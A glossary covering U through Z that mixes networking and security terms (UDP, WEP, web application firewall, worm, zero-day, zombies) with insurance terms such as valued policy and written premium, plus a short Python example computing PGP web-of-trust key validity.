A Uniform Resource Locator (URL) is the global address of documents and other resources on the World Wide Web. The first part of the address (the scheme) indicates what protocol to use, and the second part (the authority) specifies the IP address or the domain name where the resource is located, optionally with a port and a user name; a path, query string, and fragment may follow. A URL is a specific type of Uniform Resource Identifier (URI), although many people use the two terms interchangeably. A URL implies the means to access an indicated resource, which is not true of every URI. URLs occur most commonly to reference web pages (http, https) but are also used for file transfer (ftp), email (mailto), database access (JDBC), and many other applications.
URL/Web Content Filtering
URL or web content filtering describes the technology that allows organizations to block specific websites or entire categories.
User
A User is any person, organization entity, or automated process that accesses a system, whether authorized to do so or not. Users generally use a system or a software product without the technical expertise required to fully understand it.
User Contingency Plan
A User contingency plan is an alternative method of continuing business operations if IT systems are unavailable.
User Datagram Protocol
User Datagram Protocol (UDP) is a connectionless transport protocol in the Internet protocol suite and the main alternative to Transmission Control Protocol (TCP). It sends individual datagrams with no handshake, acknowledgment, retransmission, or ordering, so it is used for low-latency, loss-tolerant traffic such as DNS, VoIP, streaming, and NTP. Because there is no handshake, source addresses are trivially spoofed, which is what makes UDP services usable for reflection and amplification attacks.
UTM
UTM brings together multiple security functions into a single network appliance.
V
Valued Policy
An insurance contract for which the value is agreed upon in advance and is not related to the amount of the insured loss.
Valued Policy Law
State legislation specifies that the insured shall receive the face amount of the policy in the event of a total loss to a dwelling rather than the actual cash value regardless of the principle of indemnity.
Variable Annuity
An annuity contract under which the premium payments are used to purchase stock and the value of each unit is relative to the value of the investment portfolio.
Viatical Settlements
Contracts or agreements in which a buyer agrees to purchase all or a part of a life insurance policy.
VIPS
A Voice Intrusion Prevention System (VIPS) is a security management system for voice networks that monitors voice traffic for multiple calling patterns or attack/abuse signatures to proactively detect and prevent toll fraud, denial of service, telecom attacks, service abuse, and other anomalous activities.
Virtual Private Network
Virtual Private Network or VPN allows users to securely access a private network via an encrypted tunnel over the Internet.
Virus
A computer virus is a type of malware that inserts its own code into other programs or files and replicates when the infected host is run, spreading from computer to computer through shared files and media; unlike a worm, it needs a host program and usually a user action to propagate.
Voice Firewall
A Voice Firewall is a physical discontinuity in a voice network that monitors, alerts, and controls inbound, and outbound voice network activity based on user-defined call admission control (CAC) policies, voice application layer security threats or unauthorized service use violations.
Voice Intrusion Prevention System
A Voice Intrusion Prevention System (VIPS) is a security management system for voice networks that monitors voice traffic for multiple calling patterns or attack/abuse signatures to proactively detect and prevent toll fraud, denial of service, telecom attacks, service abuse, and other anomalous activities.
VPN
Virtual Private Network or VPN allows users to securely access a private network via an encrypted tunnel over the Internet.
Vulnerability
A vulnerability is a weakness in software, hardware, configuration, or process that an attacker can exploit to compromise the confidentiality, integrity, or availability of a system. Many vulnerabilities are bugs in program code, such as memory-safety errors or missing input validation, but misconfigurations and design flaws count as well.
W
WAP
Wireless Application Protocol (WAP) is a specification for a set of communication protocols that standardized the way wireless devices, such as cellular telephones and radio transceivers, could be used for Internet access, including e-mail, the World Wide Web, newsgroups, and Internet Relay Chat. A WAP browser is a web browser for mobile devices such as mobile phones that uses the protocol. WAP is obsolete, having been superseded by ordinary web browsers on smartphones.
War Chalking
War chalking is marking areas, usually on sidewalks with chalk, that receive wireless signals to advertise an open Wi-Fi network. War chalking was inspired by hobo symbols and was conceived by a group of friends in June 2002. They were publicized by Matt Jones who designed the set of icons and produced a downloadable document containing them.
War Dialer
A War dialer is a computer program that automatically dials a series of telephone numbers to locate lines connected to computer systems and catalogs those numbers so that a cracker or attacker can try to break into the systems.
War Dialing
War dialing is a technique of using a modem to automatically scan a list of telephone numbers, usually dialing every number in a local area code to search for computers, bulletin board systems (computer servers), and fax machines.
Wardriving
Wardriving is searching for Wi-Fi wireless networks by an individual in a moving vehicle while using a portable computer, smartphone, or personal digital assistant (PDA).
Warrant
An agreement that gives the holder the right to purchase an underlying financial instrument at a given price and time or at a series of prices and times according to a schedule or warrant agreement.
Warranty
Coverage that protects against manufacturer's defects past the normal warranty period and for repair after breakdown to return a product to its originally intended use. Warranty insurance protects consumers from financial loss caused by the seller's failure to rectify or compensate for defective or incomplete work and cost of parts and labor necessary to restore a product's usefulness. Includes but is not limited to coverage for all obligations and liabilities incurred by a service contract provider, mechanical breakdown insurance and service contracts written by insurers.
Weakness
A shortcoming or imperfection in software code, design, architecture, or deployment that, under proper conditions, could become a vulnerability.
Web Application Control
Web application control blocks unwanted applications that could cause security concerns such as P2P file sharing or instant messaging.
Web Application Firewall
A web application firewall (WAF) inspects HTTP and HTTPS traffic to a web application and blocks requests that match known attack patterns, such as SQL injection, cross-site scripting, or path traversal, as well as probes from scanners. It is a compensating control that reduces exposure while the application itself is fixed; because WAF rules can be evaded through encoding and other tricks, it does not replace secure coding.
Web Crawling
A bot (automated script) that “crawls” the internet to collect web page information such as URL, meta tags, and links.
Web of Trust
The web of trust is a concept used in PGP, GnuPG, and other OpenPGP-compatible systems to establish the authenticity of the binding between a public key and its owner. Users certify other users' keys by signing them, and each user decides how much to trust another key's owner as a certifier; a key is treated as valid when it is signed by enough trusted certifiers (in GnuPG's classic model, one fully trusted key or three marginally trusted keys, within a limited chain depth). This decentralized trust model is an alternative to the centralized trust model of a public key infrastructure (PKI), which relies on certificate authorities.
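The validity rule above, as an added example (not code from the page or from GnuPG): a fixed-point computation over a keyring in which a key may vouch for others only once it is itself valid, using GnuPG's classic defaults of three marginals, one complete, and a chain depth of five. The keyring, the owner-trust assignments, and the simplification that a certification counts regardless of the date it was made are all assumptions constructed for the example.

```python
from typing import Dict, Set

# Owner-trust levels: how much a key owner trusts another key's owner to certify third parties.
UNKNOWN, NEVER, MARGINAL, FULL, ULTIMATE = range(5)


def valid_keys(certifications: Dict[str, Set[str]], owner_trust: Dict[str, int],
               marginals_needed: int = 3, completes_needed: int = 1,
               max_cert_depth: int = 5) -> Dict[str, int]:
    """Return {key: depth} for every key whose binding to its owner is considered valid.

    Ultimately trusted keys (your own) are valid at depth 0.  A further key becomes
    valid when it carries certifications from at least completes_needed valid keys
    whose owners are fully trusted, or from at least marginals_needed valid keys whose
    owners are marginally trusted.  Rounds continue until nothing changes or the chain
    from an ultimate key would exceed max_cert_depth certifications.
    """
    valid: Dict[str, int] = {k: 0 for k, t in owner_trust.items() if t == ULTIMATE}
    for depth in range(1, max_cert_depth + 1):
        newly: Dict[str, int] = {}
        for key, signers in certifications.items():
            if key in valid:
                continue
            full = sum(1 for s in signers
                       if s in valid and owner_trust.get(s, UNKNOWN) >= FULL)
            marginal = sum(1 for s in signers
                           if s in valid and owner_trust.get(s, UNKNOWN) == MARGINAL)
            if full >= completes_needed or marginal >= marginals_needed:
                newly[key] = depth
        if not newly:
            break
        valid.update(newly)
    return valid


# Constructed keyring: key -> set of keys that have signed (certified) it.
CERTIFICATIONS = {
    "bob": {"alice"}, "carol": {"alice"}, "dave": {"alice"},
    "erin": {"bob"},
    "frank": {"carol", "dave", "erin"},          # three marginal certifiers
    "grace": {"carol", "dave"},                  # only two marginal certifiers
    "heidi": {"mallory"},                        # certified by a key nobody trusts
    "ivan": {"frank"}, "judy": {"ivan"}, "kevin": {"judy"},   # alice -> ... -> kevin is six steps
}
OWNER_TRUST = {"alice": ULTIMATE, "bob": FULL, "carol": MARGINAL, "dave": MARGINAL,
               "erin": MARGINAL, "frank": FULL, "ivan": FULL, "judy": FULL, "mallory": NEVER}

if __name__ == "__main__":
    for key, depth in sorted(valid_keys(CERTIFICATIONS, OWNER_TRUST).items()):
        print("%-6s valid at depth %d" % (key, depth))
```

Note what the model does not do: a signature from a key that is itself unverified (heidi's certifier) contributes nothing, and a long chain of fully trusted keys is cut off by the depth limit, so trust does not propagate indefinitely through a large keyring.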
Web Server
A Web server is a computer system that processes requests via HTTP, the basic network protocol used to distribute information on the World Wide Web. A web server is used to refer either the entire system, or specifically to the software that accepts and supervises the HTTP requests.
WEP
Wired Equivalent Privacy (WEP) is a security protocol for wireless local area networks defined in the original IEEE 802.11 standard ratified in 1997; its intention was to provide data confidentiality comparable to that of a traditional wired network. WEP, recognizable by its key of 10 or 26 hexadecimal digits (a 40- or 104-bit key combined with a 24-bit initialization vector), was at one time widely in use and was often the first security choice presented to users by router configuration tools. Its use of RC4 with short, repeating initialization vectors is cryptographically broken: the key can be recovered in minutes from captured traffic, IEEE deprecated WEP in 2004 in favor of 802.11i (WPA2), and any network still running it should be treated as open.
Whitelist
A whitelist (allowlist) is a list of components, such as applications, addresses, or senders, that are explicitly authorized; everything not on the list is denied. It is the inverse of a blacklist and the safer default for access decisions, because new and unknown items are blocked rather than admitted.
WHOIS
WHOIS is a query and response protocol that is widely used for querying databases that store the registered users or assignees of an Internet resource, such as a domain name, an IP address block, or an autonomous system. A client sends the name being looked up over TCP port 43 and the server returns the record in human-readable text, with no authentication or encryption. The WHOIS protocol is documented in RFC 3912; its structured successor is RDAP.
Windowing
Windowing is the process of taking a small subset of a larger dataset for processing and analysis. In this approach, the rectangular window involves truncating the dataset before and after the window, while not modifying its contents.
Windowing System
A windowing system is a system that is used for sharing a computer’s graphical display presentation resources among multiple applications at the same time. A windowing system uses a window manager to track where each window is on the display screen and its size and status. A windowing system doesn’t just manage the windows but also other forms of graphical user interface entities.
Windump
WinDump is the Windows port of tcpdump, a free protocol analyzer that captures and decodes network traffic on an interface; it relies on the WinPcap or Npcap capture driver.
Wired Equivalent Privacy
Wired Equivalent Privacy (WEP) is a security protocol for wireless local area networks defined in the original IEEE 802.11 standard ratified in 1997; its intention was to provide data confidentiality comparable to that of a traditional wired network. WEP, recognizable by its key of 10 or 26 hexadecimal digits (a 40- or 104-bit key combined with a 24-bit initialization vector), was at one time widely in use and was often the first security choice presented to users by router configuration tools. Its use of RC4 with short, repeating initialization vectors is cryptographically broken: the key can be recovered in minutes from captured traffic, IEEE deprecated WEP in 2004 in favor of 802.11i (WPA2), and any network still running it should be treated as open.
Wireless Application Protocol
Wireless Application Protocol (WAP) is a specification for a set of communication protocols that standardized the way wireless devices, such as cellular telephones and radio transceivers, could be used for Internet access, including e-mail, the World Wide Web, newsgroups, and Internet Relay Chat. A WAP browser is a web browser for mobile devices such as mobile phones that uses the protocol. WAP is obsolete, having been superseded by ordinary web browsers on smartphones.
Wiretapping
Wiretapping is the process of monitoring and recording data flowing between two points in a communication system.
World Wide Web
The World Wide Web (WWW) is the global, hypermedia-based collection of information and services available on Internet servers and accessed by browsers using Hypertext Transfer Protocol and other information retrieval mechanisms.
Worm
A worm is a type of malware that replicates itself to spread to other computers, typically over the network by exploiting vulnerabilities or weak credentials, without needing to attach itself to a host program or wait for a user to run it.
Written Premium
The contractually determined amount charged by the reporting entity to the policyholder for the effective period of the contract based on the expectation of risk, policy benefits, and expenses associated with the coverage provided by the terms of the insurance contract.
WWW
The World Wide Web (WWW) is the global, hypermedia-based collection of information and services available on Internet servers and accessed by browsers using Hypertext Transfer Protocol and other information retrieval mechanisms.
X
X.400
X.400 was originally published in 1984 by CCITT and later rewritten in 1988 jointly by ISO and CCITT. X.400 is a standard at layer 7 of the OSI model used for transporting e-mail messages. It is an alternative to the commonly used SMTP and includes support for several transport connections, including Ethernet, TCP/IP, and dial-up.
XHTML
XHTML is short for eXtensible HyperText Markup Language. XHTML is HTML reformulated as an XML application, so documents must be well-formed XML; it was designed in part so that network and portable devices could display web pages with simpler parsers. XHTML 1.0 was released as a W3C Recommendation on January 26, 2000.
XML
XML is short for eXtensible Markup Language. XML is a specification developed by the W3C, first published as a Recommendation on February 10, 1998. XML is similar to HTML in that it uses tags to mark up a document, allowing a browser or other application to interpret the tags and render or process the content. Unlike HTML, the XML vocabulary is unlimited (extensible), which allows self-defining tags that describe the content rather than only how to display it. Using XML, other languages such as RSS and MathML have been created, and tools like XSLT are themselves written in XML. Parsers that process untrusted XML should disable document type definitions and external entity resolution, since those features allow file disclosure and denial of service (XML external entity attacks).
XMPP
XMPP which stands for Extensible Messaging and Presence Protocol, is a communications protocol for messaging systems. It is based on XML, storing, and transmitting data in that format. It is used for sending and receiving instant messages, maintaining buddy lists, and broadcasting the status of one’s online presence. XMPP is an open protocol standard. Anyone can operate their own XMPP service and use it to interact with any other XMPP service. The standard is maintained by XSF, the XMPP Standards Foundation.
XMT
XMT is also called Transmit. XMT is the method of sending data to an alternate computer or device.
XNS
XNS is short for Xerox Network Systems, a proprietary suite of network communications protocols developed by Xerox. XNS is no longer used and has been replaced by TCP/IP (Transmission Control Protocol/Internet Protocol).
Y
Y2K
Y2K is short for Year 2000 Bug or the millennium bug. Y2K is a warning first published by Bob Bemer in 1971 describing the issues of computers using a two-digit year date stamp.
Ymodem
Ymodem is a file-transfer protocol developed by Chuck Forsberg that extends the 1K variant of Xmodem. It sends data in 1024-byte blocks, allows batch transfers of multiple files in one session, carries the file name and size in a header block, performs cyclic redundancy checks (CRC), and can fall back to 128-byte blocks to cope with poor connections.
Yottabyte
Yottabyte is abbreviated YB. A yottabyte is 10^24 bytes (1,000,000,000,000,000,000,000,000 bytes); the binary-prefixed counterpart, the yobibyte (YiB), is 2^80 = 1,208,925,819,614,629,174,706,176 bytes. Yotta was the largest SI prefix used for storage until ronna (10^27) and quetta (10^30) were added in 2022.
Z
Zero-Day
A zero-day vulnerability is a flaw in the software, hardware or firmware that is unknown to the responsible parties for patching or fixing the flaw.
Zero-day Attack
A zero-day (zero-hour or day-zero) attack exploits a vulnerability that is not yet known to the software vendor or to the public, so no patch or detection signature exists when the attack takes place. A zero-day exploit is the actual code that uses such a security hole to carry out an attack; these exploits are used or traded by attackers before the software developer knows about the vulnerability, and the "zero" refers to the number of days the vendor has had to fix it.
Zombies
A zombie is an infected computer that is remotely controlled by an attacker, usually without its owner's knowledge. It is part of a large group of compromised computers called a botnet, which is used for tasks such as distributed denial-of-service attacks, spam, and credential stuffing.